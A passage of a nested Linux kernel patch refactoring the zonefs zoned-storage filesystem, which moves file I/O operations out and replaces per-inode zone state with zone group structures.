+-			goto inode_unlock;
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		append = sync;
+-	}
+-
+-	if (append)
+-		ret = zonefs_file_dio_append(iocb, from);
+-	else
+-		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
+-				   &zonefs_write_dio_ops, 0, NULL, 0);
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		zi->i_wpoffset += count;
+-		zonefs_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
+-					  struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	ssize_t ret;
+-
+-	/*
+-	 * Direct IO writes are mandatory for sequential zone files so that the
+-	 * write IO issuing order is preserved.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV)
+-		return -EIO;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	ret = zonefs_write_checks(iocb, from);
+-	if (ret <= 0)
+-		goto inode_unlock;
+-
+-	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
+-	if (ret > 0)
+-		iocb->ki_pos += ret;
+-	else if (ret == -EIO)
+-		zonefs_io_error(inode, true);
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-	if (ret > 0)
+-		ret = generic_write_sync(iocb, ret);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	if (sb_rdonly(inode->i_sb))
+-		return -EROFS;
+-
+-	/* Write operations beyond the zone size are not allowed */
+-	if (iocb->ki_pos >= ZONEFS_I(inode)->i_max_size)
+-		return -EFBIG;
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		ssize_t ret = zonefs_file_dio_write(iocb, from);
+-		if (ret != -ENOTBLK)
+-			return ret;
+-	}
+-
+-	return zonefs_file_buffered_write(iocb, from);
+-}
+-
+-static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
+-				       int error, unsigned int flags)
+-{
+-	if (error) {
+-		zonefs_io_error(file_inode(iocb->ki_filp), false);
+-		return error;
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_read_dio_ops = {
+-	.end_io			= zonefs_file_read_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-	ssize_t ret;
+-
+-	/* Offline zones cannot be read */
+-	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
+-		return -EPERM;
+-
+-	if (iocb->ki_pos >= zi->i_max_size)
+-		return 0;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock_shared(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock_shared(inode);
+-	}
+-
+-	/* Limit read operations to written data */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	isize = i_size_read(inode);
+-	if (iocb->ki_pos >= isize) {
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		ret = 0;
+-		goto inode_unlock;
+-	}
+-	iov_iter_truncate(to, isize - iocb->ki_pos);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		size_t count = iov_iter_count(to);
+-
+-		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		file_accessed(iocb->ki_filp);
+-		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
+-				   &zonefs_read_dio_ops, 0, NULL, 0);
+-	} else {
+-		ret = generic_file_read_iter(iocb, to);
+-		if (ret == -EIO)
+-			zonefs_io_error(inode, false);
+-	}
+-
+-inode_unlock:
+-	inode_unlock_shared(inode);
+-
+-	return ret;
+-}
+-
+-/*
+- * Write open accounting is done only for sequential files.
+- */
+-static inline bool zonefs_seq_file_need_wro(struct inode *inode,
+-					    struct file *file)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return false;
+-
+-	if (!(file->f_mode & FMODE_WRITE))
+-		return false;
+-
+-	return true;
+-}
+-
+-static int zonefs_seq_file_write_open(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	if (!zi->i_wr_refcnt) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
+-
+-		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
+-
+-			if (sbi->s_max_wro_seq_files
+-			    && wro > sbi->s_max_wro_seq_files) {
+-				atomic_dec(&sbi->s_wro_seq_files);
+-				ret = -EBUSY;
+-				goto unlock;
+-			}
+-
+-			if (i_size_read(inode) < zi->i_max_size) {
+-				ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-				if (ret) {
+-					atomic_dec(&sbi->s_wro_seq_files);
+-					goto unlock;
+-				}
+-				zi->i_flags |= ZONEFS_ZONE_OPEN;
+-				zonefs_account_active(inode);
+-			}
+-		}
+-	}
+-
+-	zi->i_wr_refcnt++;
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
+-}
+-
+-static int zonefs_file_open(struct inode *inode, struct file *file)
+-{
+-	int ret;
+-
+-	ret = generic_file_open(inode, file);
+-	if (ret)
+-		return ret;
+-
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		return zonefs_seq_file_write_open(inode);
+-
+-	return 0;
+-}
+-
+-static void zonefs_seq_file_write_close(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	zi->i_wr_refcnt--;
+-	if (zi->i_wr_refcnt)
+-		goto unlock;
+-
+-	/*
+-	 * The file zone may not be open anymore (e.g. the file was truncated to
+-	 * its maximum size or it was fully written). For this case, we only
+-	 * need to decrement the write open count.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret) {
+-			__zonefs_io_error(inode, false);
+-			/*
+-			 * Leaving zones explicitly open may lead to a state
+-			 * where most zones cannot be written (zone resources
+-			 * exhausted). So take preventive action by remounting
+-			 * read-only.
+-			 */
+-			if (zi->i_flags & ZONEFS_ZONE_OPEN &&
+-			    !(sb->s_flags & SB_RDONLY)) {
+-				zonefs_warn(sb,
+-					"closing zone at %llu failed %d\n",
+-					zi->i_zsector, ret);
+-				zonefs_warn(sb,
+-					"remounting filesystem read-only\n");
+-				sb->s_flags |= SB_RDONLY;
+-			}
+-			goto unlock;
+-		}
+-
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-		zonefs_account_active(inode);
+-	}
+-
+-	atomic_dec(&sbi->s_wro_seq_files);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_release(struct inode *inode, struct file *file)
+-{
+-	/*
+-	 * If we explicitly open a zone we must close it again as well, but the
+-	 * zone management operation can fail (either due to an IO error or as
+-	 * the zone has gone offline or read-only). Make sure we don't fail the
+-	 * close(2) for user-space.
+-	 */
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		zonefs_seq_file_write_close(inode);
+-
+-	return 0;
+-}
+-
+-static const struct file_operations zonefs_file_operations = {
+-	.open		= zonefs_file_open,
+-	.release	= zonefs_file_release,
+-	.fsync		= zonefs_file_fsync,
+-	.mmap		= zonefs_file_mmap,
+-	.llseek		= zonefs_file_llseek,
+-	.read_iter	= zonefs_file_read_iter,
+-	.write_iter	= zonefs_file_write_iter,
+-	.splice_read	= generic_file_splice_read,
+-	.splice_write	= iter_file_splice_write,
+-	.iopoll		= iocb_bio_iopoll,
+-};
+-
+ static struct kmem_cache *zonefs_inode_cachep;
+ 
+ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+@@ -1282,7 +414,6 @@ static struct inode *zonefs_alloc_inode(struct super_block *sb)
+ 	inode_init_once(&zi->i_vnode);
+ 	mutex_init(&zi->i_truncate_mutex);
+ 	zi->i_wr_refcnt = 0;
+-	zi->i_flags = 0;
+ 
+ 	return &zi->i_vnode;
+ }
+@@ -1315,8 +446,8 @@ static int zonefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	buf->f_bavail = buf->f_bfree;
+ 
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		if (sbi->s_nr_files[t])
+-			buf->f_files += sbi->s_nr_files[t] + 1;
++		if (sbi->s_zgroup[t].g_nr_zones)
++			buf->f_files += sbi->s_zgroup[t].g_nr_zones + 1;
+ 	}
+ 	buf->f_ffree = 0;
+ 
+@@ -1382,51 +513,85 @@ static int zonefs_parse_options(struct super_block *sb, char *options)
+ 		}
+ 	}
+ 
+-	return 0;
+-}
++	return 0;
++}
++
++static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
++		seq_puts(seq, ",errors=remount-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
++		seq_puts(seq, ",errors=zone-ro");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
++		seq_puts(seq, ",errors=zone-offline");
++	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
++		seq_puts(seq, ",errors=repair");
++
++	return 0;
++}
++
++static int zonefs_remount(struct super_block *sb, int *flags, char *data)
++{
++	sync_filesystem(sb);
++
++	return zonefs_parse_options(sb, data);
++}
++
++static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
++				struct dentry *dentry, struct iattr *iattr)
++{
++	struct inode *inode = d_inode(dentry);
++	int ret;
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	ret = setattr_prepare(&init_user_ns, dentry, iattr);
++	if (ret)
++		return ret;
++
++	/*
++	 * Since files and directories cannot be created or deleted, do not
++	 * allow setting any write attributes on the sub-directories grouping
++	 * files by zone type.
++	 */
++	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
++	    (iattr->ia_mode & 0222))
++		return -EPERM;
++
++	if (((iattr->ia_valid & ATTR_UID) &&
++	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
++	    ((iattr->ia_valid & ATTR_GID) &&
++	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
++		ret = dquot_transfer(mnt_userns, inode, iattr);
++		if (ret)
++			return ret;
++	}
+ 
+-static int zonefs_show_options(struct seq_file *seq, struct dentry *root)
+-{
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(root->d_sb);
++	if (iattr->ia_valid & ATTR_SIZE) {
++		ret = zonefs_file_truncate(inode, iattr->ia_size);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO)
+-		seq_puts(seq, ",errors=remount-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)
+-		seq_puts(seq, ",errors=zone-ro");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)
+-		seq_puts(seq, ",errors=zone-offline");
+-	if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_REPAIR)
+-		seq_puts(seq, ",errors=repair");
++	setattr_copy(&init_user_ns, inode, iattr);
+ 
+ 	return 0;
+ }
+ 
+-static int zonefs_remount(struct super_block *sb, int *flags, char *data)
+-{
+-	sync_filesystem(sb);
+-
+-	return zonefs_parse_options(sb, data);
+-}
+-
+-static const struct super_operations zonefs_sops = {
+-	.alloc_inode	= zonefs_alloc_inode,
+-	.free_inode	= zonefs_free_inode,
+-	.statfs		= zonefs_statfs,
+-	.remount_fs	= zonefs_remount,
+-	.show_options	= zonefs_show_options,
+-};
+-
+ static const struct inode_operations zonefs_dir_inode_operations = {
+ 	.lookup		= simple_lookup,
+ 	.setattr	= zonefs_inode_setattr,
+ };
+ 
+ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+-				  enum zonefs_ztype type)
++				  enum zonefs_ztype ztype)
+ {
+ 	struct super_block *sb = parent->i_sb;
+ 
+-	inode->i_ino = bdev_nr_zones(sb->s_bdev) + type + 1;
++	inode->i_ino = bdev_nr_zones(sb->s_bdev) + ztype + 1;
+ 	inode_init_owner(&init_user_ns, inode, parent, S_IFDIR | 0555);
+ 	inode->i_op = &zonefs_dir_inode_operations;
+ 	inode->i_fop = &simple_dir_operations;
+@@ -1434,73 +599,38 @@ static void zonefs_init_dir_inode(struct inode *parent, struct inode *inode,
+ 	inc_nlink(parent);
+ }
+ 
+-static int zonefs_init_file_inode(struct inode *inode, struct blk_zone *zone,
+-				  enum zonefs_ztype type)
++static const struct inode_operations zonefs_file_inode_operations = {
++	.setattr	= zonefs_inode_setattr,
++};
++
++static void zonefs_init_file_inode(struct inode *inode,
++				   struct zonefs_zone *z)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	inode->i_ino = zone->start >> sbi->s_zone_sectors_shift;
+-	inode->i_mode = S_IFREG | sbi->s_perm;
+-
+-	zi->i_ztype = type;
+-	zi->i_zsector = zone->start;
+-	zi->i_zone_size = zone->len << SECTOR_SHIFT;
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
+-	    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-		zonefs_err(sb,
+-			   "zone size %llu doesn't match device's zone sectors %llu\n",
+-			   zi->i_zone_size,
+-			   bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
+-		return -EINVAL;
+-	}
+ 
+-	zi->i_max_size = min_t(loff_t, MAX_LFS_FILESIZE,
+-			       zone->capacity << SECTOR_SHIFT);
+-	zi->i_wpoffset = zonefs_check_zone_condition(inode, zone, true, true);
++	inode->i_private = z;
+ 
++	inode->i_ino = z->z_sector >> sbi->s_zone_sectors_shift;
++	inode->i_mode = S_IFREG | sbi->s_perm;
+ 	inode->i_uid = sbi->s_uid;
+ 	inode->i_gid = sbi->s_gid;
+-	inode->i_size = zi->i_wpoffset;
+-	inode->i_blocks = zi->i_max_size >> SECTOR_SHIFT;
++	inode->i_size = z->z_wpoffset;
++	inode->i_blocks = z->z_capacity >> SECTOR_SHIFT;
+ 
+ 	inode->i_op = &zonefs_file_inode_operations;
+ 	inode->i_fop = &zonefs_file_operations;
+ 	inode->i_mapping->a_ops = &zonefs_file_aops;
+ 
+-	sb->s_maxbytes = max(zi->i_max_size, sb->s_maxbytes);
+-	sbi->s_blocks += zi->i_max_size >> sb->s_blocksize_bits;
+-	sbi->s_used_blocks += zi->i_wpoffset >> sb->s_blocksize_bits;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	/*
+-	 * For sequential zones, make sure that any open zone is closed first
+-	 * to ensure that the initial number of open zones is 0, in sync with
+-	 * the open zone accounting done when the mount option
+-	 * ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
+-	 */
+-	if (type == ZONEFS_ZTYPE_SEQ &&
+-	    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
+-	     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret)
+-			goto unlock;
+-	}
+-
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
++	/* Update the inode access rights depending on the zone condition */
++	z->z_flags |= ZONEFS_ZONE_INIT_MODE;
++	zonefs_inode_update_mode(inode);
+ }
+ 
+ static struct dentry *zonefs_create_inode(struct dentry *parent,
+-					const char *name, struct blk_zone *zone,
+-					enum zonefs_ztype type)
++					  const char *name,
++					  struct zonefs_zone *z,
++					  enum zonefs_ztype ztype)
+ {
+ 	struct inode *dir = d_inode(parent);
+ 	struct dentry *dentry;
+@@ -1516,15 +646,10 @@ static struct dentry *zonefs_create_inode(struct dentry *parent,
+ 		goto dput;
+ 
+ 	inode->i_ctime = inode->i_mtime = inode->i_atime = dir->i_ctime;
+-	if (zone) {
+-		ret = zonefs_init_file_inode(inode, zone, type);
+-		if (ret) {
+-			iput(inode);
+-			goto dput;
+-		}
+-	} else {
+-		zonefs_init_dir_inode(dir, inode, type);
+-	}
++	if (z)
++		zonefs_init_file_inode(inode, z);
++	else
++		zonefs_init_dir_inode(dir, inode, ztype);
+ 
+ 	d_add(dentry, inode);
+ 	dir->i_size++;
+@@ -1540,100 +665,51 @@ dput:
+ struct zonefs_zone_data {
+ 	struct super_block	*sb;
+ 	unsigned int		nr_zones[ZONEFS_ZTYPE_MAX];
++	sector_t		cnv_zone_start;
+ 	struct blk_zone		*zones;
+ };
+ 
+ /*
+- * Create a zone group and populate it with zone files.
++ * Create the inodes for a zone group.
+  */
+-static int zonefs_create_zgroup(struct zonefs_zone_data *zd,
+-				enum zonefs_ztype type)
++static int zonefs_create_zgroup_inodes(struct super_block *sb,
++				       enum zonefs_ztype ztype)
+ {
+-	struct super_block *sb = zd->sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	struct blk_zone *zone, *next, *end;
+-	const char *zgroup_name;
+-	char *file_name;
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
+ 	struct dentry *dir, *dent;
+-	unsigned int n = 0;
+-	int ret;
++	char *file_name;
++	int i, ret = 0;
++
++	if (!zgroup)
++		return -ENOMEM;
+ 
+ 	/* If the group is empty, there is nothing to do */
+-	if (!zd->nr_zones[type])
++	if (!zgroup->g_nr_zones)
+ 		return 0;
+ 
+ 	file_name = kmalloc(ZONEFS_NAME_MAX, GFP_KERNEL);
+ 	if (!file_name)
+ 		return -ENOMEM;
+ 
+-	if (type == ZONEFS_ZTYPE_CNV)
+-		zgroup_name = "cnv";
+-	else
+-		zgroup_name = "seq";
+-
+-	dir = zonefs_create_inode(sb->s_root, zgroup_name, NULL, type);
++	dir = zonefs_create_inode(sb->s_root, zonefs_zgroup_name(ztype),
++				  NULL, ztype);
+ 	if (IS_ERR(dir)) {
+ 		ret = PTR_ERR(dir);
+ 		goto free;
+ 	}
+ 
+-	/*
+-	 * The first zone contains the super block: skip it.
+-	 */
+-	end = zd->zones + bdev_nr_zones(sb->s_bdev);
+-	for (zone = &zd->zones[1]; zone < end; zone = next) {
+-
+-		next = zone + 1;
+-		if (zonefs_zone_type(zone) != type)
+-			continue;
+-
+-		/*
+-		 * For conventional zones, contiguous zones can be aggregated
+-		 * together to form larger files. Note that this overwrites the
+-		 * length of the first zone of the set of contiguous zones
+-		 * aggregated together. If one offline or read-only zone is
+-		 * found, assume that all zones aggregated have the same
+-		 * condition.
+-		 */
+-		if (type == ZONEFS_ZTYPE_CNV &&
+-		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
+-			for (; next < end; next++) {
+-				if (zonefs_zone_type(next) != type)
+-					break;
+-				zone->len += next->len;
+-				zone->capacity += next->capacity;
+-				if (next->cond == BLK_ZONE_COND_READONLY &&
+-				    zone->cond != BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_READONLY;
+-				else if (next->cond == BLK_ZONE_COND_OFFLINE)
+-					zone->cond = BLK_ZONE_COND_OFFLINE;
+-			}
+-			if (zone->capacity != zone->len) {
+-				zonefs_err(sb, "Invalid conventional zone capacity\n");
+-				ret = -EINVAL;
+-				goto free;
+-			}
+-		}
+-
+-		/*
+-		 * Use the file number within its group as file name.
+-		 */
+-		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", n);
+-		dent = zonefs_create_inode(dir, file_name, zone, type);
++	for (i = 0; i < zgroup->g_nr_zones; i++) {
++		/* Use the zone number within its group as the file name */
++		snprintf(file_name, ZONEFS_NAME_MAX - 1, "%u", i);
++		dent = zonefs_create_inode(dir, file_name,
++					   &zgroup->g_zones[i], ztype);
+ 		if (IS_ERR(dent)) {
+ 			ret = PTR_ERR(dent);
+-			goto free;
++			break;
+ 		}
+-
+-		n++;
+ 	}
+ 
+-	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
+-		    zgroup_name, n, n > 1 ? "s" : "");
+-
+-	sbi->s_nr_files[type] = n;
+-	ret = 0;
+-
+ free:
+ 	kfree(file_name);
+ 
+@@ -1644,21 +720,38 @@ static int zonefs_get_zone_info_cb(struct blk_zone *zone, unsigned int idx,
+ 				   void *data)
+ {
+ 	struct zonefs_zone_data *zd = data;
++	struct super_block *sb = zd->sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++
++	/*
++	 * We do not care about the first zone: it contains the super block
++	 * and is not exposed as a file.
++	 */
++	if (!idx)
++		return 0;
+ 
+ 	/*
+-	 * Count the number of usable zones: the first zone at index 0 contains
+-	 * the super block and is ignored.
++	 * Count the number of zones that will be exposed as files.
++	 * For sequential zones, we always have as many files as zones.
++	 * For conventional zones, the number of files depends on whether
++	 * conventional zone aggregation is enabled.
+ 	 */
+ 	switch (zone->type) {
+ 	case BLK_ZONE_TYPE_CONVENTIONAL:
+-		zone->wp = zone->start + zone->len;
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_CNV]++;
++		if (sbi->s_features & ZONEFS_F_AGGRCNV) {
++			/* One file per set of contiguous conventional zones */
++			if (!(sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones) ||
++			    zone->start != zd->cnv_zone_start)
++				sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++			zd->cnv_zone_start = zone->start + zone->len;
++		} else {
++			/* One file per zone */
++			sbi->s_zgroup[ZONEFS_ZTYPE_CNV].g_nr_zones++;
++		}
+ 		break;
+ 	case BLK_ZONE_TYPE_SEQWRITE_REQ:
+ 	case BLK_ZONE_TYPE_SEQWRITE_PREF:
+-		if (idx)
+-			zd->nr_zones[ZONEFS_ZTYPE_SEQ]++;
++		sbi->s_zgroup[ZONEFS_ZTYPE_SEQ].g_nr_zones++;
+ 		break;
+ 	default:
+ 		zonefs_err(zd->sb, "Unsupported zone type 0x%x\n",
+@@ -1698,11 +791,173 @@ static int zonefs_get_zone_info(struct zonefs_zone_data *zd)
+ 	return 0;
+ }
+ 
+-static inline void zonefs_cleanup_zone_info(struct zonefs_zone_data *zd)
++static inline void zonefs_free_zone_info(struct zonefs_zone_data *zd)
+ {
+ 	kvfree(zd->zones);
+ }
+ 
++/*
++ * Create a zone group and populate it with zone files.
++ */
++static int zonefs_init_zgroup(struct super_block *sb,
++			      struct zonefs_zone_data *zd,
++			      enum zonefs_ztype ztype)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	struct zonefs_zone_group *zgroup = &sbi->s_zgroup[ztype];
++	struct blk_zone *zone, *next, *end;
++	struct zonefs_zone *z;
++	unsigned int n = 0;
++	int ret;
++
++	/* Allocate the zone group. If it is empty, we have nothing to do. */
++	if (!zgroup->g_nr_zones)
++		return 0;
++
++	zgroup->g_zones = kvcalloc(zgroup->g_nr_zones,
++				   sizeof(struct zonefs_zone), GFP_KERNEL);
++	if (!zgroup->g_zones)
++		return -ENOMEM;
++
++	/*
++	 * Initialize the zone groups using the device zone information.
++	 * We always skip the first zone as it contains the super block
++	 * and is not used to back a file.
++	 */
++	end = zd->zones + bdev_nr_zones(sb->s_bdev);
++	for (zone = &zd->zones[1]; zone < end; zone = next) {
++
++		next = zone + 1;
++		if (zonefs_zone_type(zone) != ztype)
++			continue;
++
++		if (WARN_ON_ONCE(n >= zgroup->g_nr_zones))
++			return -EINVAL;
++
++		/*
++		 * For conventional zones, contiguous zones can be aggregated
++		 * together to form larger files. Note that this overwrites the
++		 * length of the first zone of the set of contiguous zones
++		 * aggregated together. If one offline or read-only zone is
++		 * found, assume that all zones aggregated have the same
++		 * condition.
++		 */
++		if (ztype == ZONEFS_ZTYPE_CNV &&
++		    (sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			for (; next < end; next++) {
++				if (zonefs_zone_type(next) != ztype)
++					break;
++				zone->len += next->len;
++				zone->capacity += next->capacity;
++				if (next->cond == BLK_ZONE_COND_READONLY &&
++				    zone->cond != BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_READONLY;
++				else if (next->cond == BLK_ZONE_COND_OFFLINE)
++					zone->cond = BLK_ZONE_COND_OFFLINE;
++			}
++		}
++
++		z = &zgroup->g_zones[n];
++		if (ztype == ZONEFS_ZTYPE_CNV)
++			z->z_flags |= ZONEFS_ZONE_CNV;
++		z->z_sector = zone->start;
++		z->z_size = zone->len << SECTOR_SHIFT;
++		if (z->z_size > bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT &&
++		    !(sbi->s_features & ZONEFS_F_AGGRCNV)) {
++			zonefs_err(sb,
++				"Invalid zone size %llu (device zone sectors %llu)\n",
++				z->z_size,
++				bdev_zone_sectors(sb->s_bdev) << SECTOR_SHIFT);
++			return -EINVAL;
++		}
++
++		z->z_capacity = min_t(loff_t, MAX_LFS_FILESIZE,
++				      zone->capacity << SECTOR_SHIFT);
++		z->z_wpoffset = zonefs_check_zone_condition(sb, z, zone);
++
++		sb->s_maxbytes = max(z->z_capacity, sb->s_maxbytes);
++		sbi->s_blocks += z->z_capacity >> sb->s_blocksize_bits;
++		sbi->s_used_blocks += z->z_wpoffset >> sb->s_blocksize_bits;
++
++		/*
++		 * For sequential zones, make sure that any open zone is closed
++		 * first to ensure that the initial number of open zones is 0,
++		 * in sync with the open zone accounting done when the mount
++		 * option ZONEFS_MNTOPT_EXPLICIT_OPEN is used.
++		 */
++		if (ztype == ZONEFS_ZTYPE_SEQ &&
++		    (zone->cond == BLK_ZONE_COND_IMP_OPEN ||
++		     zone->cond == BLK_ZONE_COND_EXP_OPEN)) {
++			ret = zonefs_zone_mgmt(sb, z, REQ_OP_ZONE_CLOSE);
++			if (ret)
++				return ret;
++		}
++
++		zonefs_account_active(sb, z);
++
++		n++;
++	}
++
++	if (WARN_ON_ONCE(n != zgroup->g_nr_zones))
++		return -EINVAL;
++
++	zonefs_info(sb, "Zone group \"%s\" has %u file%s\n",
++		    zonefs_zgroup_name(ztype),
++		    zgroup->g_nr_zones,
++		    zgroup->g_nr_zones > 1 ? "s" : "");
++
++	return 0;
++}
++
++static void zonefs_free_zgroups(struct super_block *sb)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	enum zonefs_ztype ztype;
++
++	if (!sbi)
++		return;
++
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		kvfree(sbi->s_zgroup[ztype].g_zones);
++		sbi->s_zgroup[ztype].g_zones = NULL;
++	}
++}
++
++/*
++ * Initialize all zone groups from the device zone information.
++ */
++static int zonefs_init_zgroups(struct super_block *sb)
++{
++	struct zonefs_zone_data zd;
++	enum zonefs_ztype ztype;
++	int ret;
++
++	/* First get the device zone information */
++	memset(&zd, 0, sizeof(struct zonefs_zone_data));
++	zd.sb = sb;
++	ret = zonefs_get_zone_info(&zd);
++	if (ret)
++		goto cleanup;
++
++	/* Allocate and initialize the zone groups */
++	for (ztype = 0; ztype < ZONEFS_ZTYPE_MAX; ztype++) {
++		ret = zonefs_init_zgroup(sb, &zd, ztype);
++		if (ret) {
++			zonefs_info(sb,
++				    "Zone group \"%s\" initialization failed\n",
++				    zonefs_zgroup_name(ztype));
++			break;
++		}
++	}
++
++cleanup:
++	zonefs_free_zone_info(&zd);
++	if (ret)
++		zonefs_free_zgroups(sb);
++
++	return ret;
++}
++
+ /*
+  * Read super block information from the device.
+  */
+@@ -1785,6 +1040,14 @@ free_page:
+ 	return ret;
+ }
+ 
++static const struct super_operations zonefs_sops = {
++	.alloc_inode	= zonefs_alloc_inode,
++	.free_inode	= zonefs_free_inode,
++	.statfs		= zonefs_statfs,
++	.remount_fs	= zonefs_remount,
++	.show_options	= zonefs_show_options,
++};
++
+ /*
+  * Check that the device is zoned. If it is, get the list of zones and create
+  * sub-directories and files according to the device zone configuration and
+@@ -1792,7 +1055,6 @@ free_page:
+  */
+ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ {
